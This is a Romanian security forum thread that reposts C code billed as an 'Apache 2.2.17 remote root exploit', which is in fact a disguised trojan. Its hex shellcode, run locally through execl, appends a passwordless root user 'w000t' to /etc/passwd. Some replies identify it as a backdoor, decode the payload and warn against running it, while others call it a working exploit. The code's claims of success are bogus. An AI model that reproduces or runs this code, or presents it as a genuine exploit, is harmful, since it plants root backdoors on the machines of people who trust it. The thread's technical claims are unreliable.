Nytro Posted October 19, 2011 Report Share Posted October 19, 2011 Apache 2.2.17 remote root exploit/* apachesm4sh.c apache 2.2.17 remote root exploit*//* KEEP PRIV8&!&! leak and i will find you ~ desg */#include <stdio.h>#include <stdlib.h>#include <string.h>#include <strings.h>#include <netdb.h>#include <unistd.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>char evil[] = "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89" "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89" "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8" "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23" "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74" "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a" "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68" "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44" "\x44\x44";#define NOP 0x90#define BSIZE 1000#define OFFSET 400#define ADDR 0xbffff658#define ASIZE 2000intmain(int argc, char *argv[]){ char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>\n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '\0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such server\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socket\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused\n"); exit(1); } printf("sending exploit code...\n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!\n"); else printf("sorry, this site isn't vulnerable\n"); printf("waiting for shell.....\n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ }}Sau: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.comDiscutie aici, e posibil sa nu fie exploit: Full Disclosure: Apache 2.2.17 exploit? Quote Link to comment Share on other sites More sharing options...
gogusan Posted October 19, 2011 Report Share Posted October 19, 2011 ooo daa, 10x! Quote Link to comment Share on other sites More sharing options...
Fed0t Posted October 20, 2011 Report Share Posted October 20, 2011 ooo daa, 10x!gogusan si merge l-ai incercat? Quote Link to comment Share on other sites More sharing options...
adi003user Posted October 20, 2011 Report Share Posted October 20, 2011 It's a trojan, based on the w00t-shell.c code Quote Link to comment Share on other sites More sharing options...
fjtr Posted October 20, 2011 Report Share Posted October 20, 2011 super tare, adaugat la colectie Quote Link to comment Share on other sites More sharing options...
icemerc Posted October 20, 2011 Report Share Posted October 20, 2011 am testat acum e backedoor care daca e rulat cu drept de root adauga un user w00t cu drept de root, deci nu il folositi Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 21, 2011 Author Report Share Posted October 21, 2011 Acel "evil" hex se termina cu:"/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"Trimite datele unde ziceti voi:send(s, buffer, strlen(buffer), 0)Asta e executat local...execl("/bin/sh", "sh", "-c", evil, 0);Deci cred ca e fake, backdoor, deci nu executati (cel putin NU ca root). Sau scoateti: if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL);Desi acesta e posibil sa fie necesar pentru shell. Nu stiu ce fac primele instructiuni, daca am timp si reusesc sa dezasamblez datele din hex, poate imi dau seama daca infecteaza sau nu. Deocamdata nu sunt sigur daca e backdoor sau nu, rulati ca user normal si nu ar trebui sa fie probleme. Quote Link to comment Share on other sites More sharing options...
Fed0t Posted October 21, 2011 Report Share Posted October 21, 2011 eu zic ca e bun...face buffer overflow pe tinta...si deschide o sesiune Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 21, 2011 Author Report Share Posted October 21, 2011 Cred ca e fake, cel putin asa spun niste persoane care l-au analizat.Creeaza un cont de root fara parola. Quote Link to comment Share on other sites More sharing options...